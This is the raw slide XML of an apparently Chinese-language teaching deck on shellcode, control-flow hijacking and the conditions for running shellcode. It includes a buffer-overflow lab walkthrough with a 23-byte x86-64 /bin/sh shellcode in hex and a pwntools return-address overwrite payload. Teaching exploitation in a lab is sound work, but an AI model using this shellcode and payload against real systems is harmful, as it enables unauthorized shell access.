              <a:t>4.PIE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>： 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PingFang SC"/>
              </a:rPr>
              <a:t>PIE enable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>（开启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PingFang SC"/>
              </a:rPr>
              <a:t>ASLR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>地址随机化）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="555555"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="PingFang SC"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="555555"/>
              </a:solidFill>
              <a:latin typeface="PingFang SC"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>5.RWX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>：是否具备可读写执行代码段权限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215500"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition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TextBox 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B31AB80-4FD1-4823-B6DD-03CFB324A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6" y="107951"/>
            <a:ext cx="46593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操作过程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2E6630-E169-FBB5-5E7A-5D17F95F259D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="687841" y="1105291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对原本的程序使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IDA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行反汇编，查看程序的源码。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B76D15-B6B6-2E63-589D-31CDF80E8537}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8414345" y="2775696"/>
            <a:ext cx="35663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源码内部的变量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>v4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>作为可以利用的缓冲区，可以对此进行操作，来对返回地址进行覆盖，为执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>创造条件。在这个例子里面是使用了结构</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>%p\n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>来获取到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>v4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>的地址。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BF2DCE-B547-A558-0563-D00CA7C88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80" y="1448221"/>
            <a:ext cx="7632236" cy="5301828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4B2A581B-95D9-8AB8-59C6-EE59E02BAA1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7130375" y="3552371"/>
            <a:ext cx="1128408" cy="229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370133"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition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TextBox 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B31AB80-4FD1-4823-B6DD-03CFB324A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6" y="107951"/>
            <a:ext cx="46593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操作过程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33C04C-13B8-A4E9-7C9D-B8DB69FDB35F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="991194" y="1713605"/>
            <a:ext cx="72384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shell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\x31\xf6\x48\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-C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xbb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-C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\x2f\x62\x69\x6e\x2f\x2f\x73\	x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05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F6B477-C2B6-462A-08F6-4329B5E4835F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="991194" y="920581"/>
            <a:ext cx="3746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使用了一个长为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>23</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字节的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Shellcode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923742"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition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TextBox 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B31AB80-4FD1-4823-B6DD-03CFB324A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6" y="107951"/>
            <a:ext cx="46593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操作过程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C69BA1-360B-D1CE-8E19-4BDF9BF3EEAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="898326" y="1247656"/>
            <a:ext cx="1709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覆盖返回地址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DC8BBA-2348-644F-13EB-873DAB93EB57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="898326" y="2111652"/>
            <a:ext cx="7316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effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'a'*136 + p64(int(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>p.recvuntil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('\n', drop=True),16)+144)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BA4FB4-73CF-119D-E5D3-274FDE9980E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="898327" y="2975648"/>
            <a:ext cx="73169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原本的缓冲区大小为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>128</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>128+8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>作为脏数据，对缓冲区（大小为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>128</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）和返回地址（大小为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）进行覆盖。接着将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的地址放到返回地址的位置，也就是再加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>8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19093010"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition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DB6C6D6-3B5D-402E-9D82-821551F32729}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="51397" y="3205255"/>
            <a:ext cx="12097060" cy="3492618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a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0229" name="文本框 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA2DA7B2-0B25-43C8-A061-8014E51ED21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57363" y="696914"/>
            <a:ext cx="8621712" cy="327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4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0353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</p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition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7" name="组合 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD368EAE-8483-4CC6-B2D2-BB1A59B871A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5217406" y="2471149"/>
            <a:ext cx="5153025" cy="762000"/>
            <a:chOff x="7532" y="2656"/>
            <a:chExt cx="6086" cy="899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914D63D9-D163-4B9A-ADEB-4DB570F31CB2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7532" y="2656"/>
              <a:ext cx="904" cy="899"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="014B8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noProof="1"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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>1</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1" noProof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001" name="MH_SubTitle_1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBFD78E5-28AE-4A5D-ACF6-8CEEEA90D569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8797" y="2862"/>
              <a:ext cx="4821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rgbClr val="0353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shellcode</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0353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zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03539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988" name="组合 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C580958E-98C6-4E81-8862-FF72B94D8658}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5217406" y="3338423"/>
            <a:ext cx="4989513" cy="760413"/>
            <a:chOff x="7532" y="4082"/>
            <a:chExt cx="5115" cy="899"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41998" name="MH_SubTitle_2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F49D9F8-A5C0-4287-86C9-11B9DE3714A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8630" y="4288"/>
              <a:ext cx="4017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0353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endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03539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344687BC-0E51-47CE-A903-D27F22844253}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7532" y="4082"/>
              <a:ext cx="784" cy="899"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="014B8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noProof="1"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2" name="MH_SubTitle_1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAB226C2-4A30-D255-5DAB-F4E82B002D0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51394" y="2852149"/>
            <a:ext cx="17246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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0353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5400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="03539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8232C3-52A0-4616-8096-DC653489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AF7BB-267A-40D2-867D-FDA4910D6EA9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43011" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A4D4A57-0EDB-40A2-8226-305706186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964" y="1120775"/>
            <a:ext cx="43556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3539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第一节  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03539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shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03539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简介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749A628-F068-42B9-A12E-C1095108CBC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4114801" y="1935388"/>
            <a:ext cx="581025" cy="606425"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="014B8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noProof="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204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一</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43013" name="MH_SubTitle_1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1806846B-F1BE-4AAB-96F9-F7F01D8522E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045075" y="2008413"/>
            <a:ext cx="3454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3539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Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03539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与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03539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shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="03539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4" name="MH_SubTitle_1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0132AE8-F04D-4F94-B667-65D5DD0F0E4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45074" y="2825638"/>
            <a:ext cx="40254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3539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控制流劫持与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03539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shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="03539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6" name="MH_SubTitle_1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FCF0B57-78E7-4AA0-8A22-FA53C11477A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96190" y="3643537"/>
            <a:ext cx="3454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3539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Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03539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执行条件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="03539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8BD11B60-5C47-41F1-AB7C-092F12F0733B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4114801" y="2738663"/>
            <a:ext cx="581025" cy="606425"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="014B8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noProof="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204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二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63271FF8-AD02-4E47-97C0-7CE303A59348}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4114801" y="3564163"/>
            <a:ext cx="581025" cy="606425"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="014B8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noProof="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204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三</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition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25F6FA-6813-47AC-9A9D-660601A6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3C339-E910-450F-8393-0E0EA8B279E4}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US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EDC79D4-A53A-4C8A-BA75-BE7831FE04EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1825626" y="4238448"/>
            <a:ext cx="8604250" cy="11460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265" eaLnBrk="1" fontAlgn="auto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Shellcode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是一段可以执行特定功能的特殊汇编代码，在设备漏洞利用过程中注入到目标程序中从而被执行。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Shellcode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原意指获取到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shell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的代码，现在泛指利用过程中获得控制权后执行的代码。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="03539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4072" name="TextBox 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{087082F0-4586-42A5-AA18-D94662A45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3" y="3638622"/>
            <a:ext cx="86042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shellcode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36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BF576A8-DF59-408A-BCCC-C830CF072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6" y="107951"/>
            <a:ext cx="46593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shellcode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36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCBBAC48-4009-4276-B426-067B6D690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3" y="793750"/>
            <a:ext cx="8604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（一）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EFF735-B896-2706-3359-8303CA5ADA24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1825626" y="1419224"/>
            <a:ext cx="60946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Shell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是一个用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语言编写的程序，它是用户使用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Linux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的桥梁。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Shell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既是一种命令语言，又是一种程序设计语言。</a:t>
            </a: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Shell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是指一种应用程序，这个应用程序提供了一个界面，用户通过这个界面访问操作系统内核的服务。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1C2181-F39B-5B7C-9373-509373FED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64" y="1863038"/>
            <a:ext cx="3128636" cy="756515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TextBox 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B31AB80-4FD1-4823-B6DD-03CFB324A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6" y="107951"/>
            <a:ext cx="46593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控制流劫持与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shellcode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577BB0-E723-ADA4-6D97-D5AE70EAEAF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1107963" y="942886"/>
            <a:ext cx="97750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	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控制流劫持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主要强调执行控制权，而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shellcode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更关注于有了控制权之后的功能。因此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shellcode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更像是控制流劫持的载荷，往往对于不同漏洞来讲控制流劫持是特殊的，而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shellcode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会具有一些通用性。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C5C357-DD02-1622-E3BD-68E93C9DD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165" y="1866216"/>
            <a:ext cx="4757350" cy="43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67297"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition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TextBox 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B31AB80-4FD1-4823-B6DD-03CFB324A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6" y="107951"/>
            <a:ext cx="46593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控制流劫持与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shellcode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C5C357-DD02-1622-E3BD-68E93C9DD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679" y="1250108"/>
            <a:ext cx="4757350" cy="435778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824E1EC-25AF-4BF5-B206-3F9CE19B95A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755971" y="1464520"/>
            <a:ext cx="6094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控制流劫持利用程序的漏洞劫持进程的控制权，之后转去执行植入的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/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951B96-2A33-651E-CE78-56B755B63CA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1169534" y="2925926"/>
            <a:ext cx="5606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控制流劫持是拿下系统前进行的活动，目标是拿下目标系统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A82294-E0F0-17A2-B29C-01DDB8AC1489}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1169534" y="4110726"/>
            <a:ext cx="5606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shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是拿下系统后进行的活动，在目标系统执行的代码或指令</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1751001640"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition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C3BB57-2144-466F-9259-23561FE6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503788-C6F8-4AA9-A70A-51E9ECDD070C}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US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46084" name="TextBox 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A0251FA-19A0-4F78-9BD6-6904A095B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6" y="107951"/>
            <a:ext cx="46593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shellcode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执行条件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5" name="TextBox 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1DDE58E-90B4-43A6-A4EC-D46EEAE58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5" y="800100"/>
            <a:ext cx="53163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（一） 拥有程序控制权</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8670774D-0672-4D9A-0875-AEA112C9C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4" y="2683298"/>
            <a:ext cx="53163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（二）拥有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shellcode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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2725C996-E27B-EAB7-B5EA-35BE587D8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4" y="4566496"/>
            <a:ext cx="53163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（三）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shellcode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在可执行内存空间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DA7973-75F0-8AAB-27F0-813EC445A91D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2426833" y="1341589"/>
            <a:ext cx="77213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	shellcode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等的定位是漏洞触发之后的漏洞利用，主要负责实现攻击者的攻击目的，需要控制流劫持获得进程的控制权这个前提。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37056B-B381-0D30-B6EC-D2038CD8A845}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2426832" y="3202638"/>
            <a:ext cx="77213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	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不论是程序拥有随机化还是固定基地址，都需要在跳转之前获取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shellcode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存储地址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03C3A8-C55F-2C5D-6ED4-67EA5AB6D1A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2426831" y="5147079"/>
            <a:ext cx="7721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	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最后跳转到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shellcode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地址上后需要有可执行权限才能执行。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228138"/>
      </p:ext>
    </p:extLst>
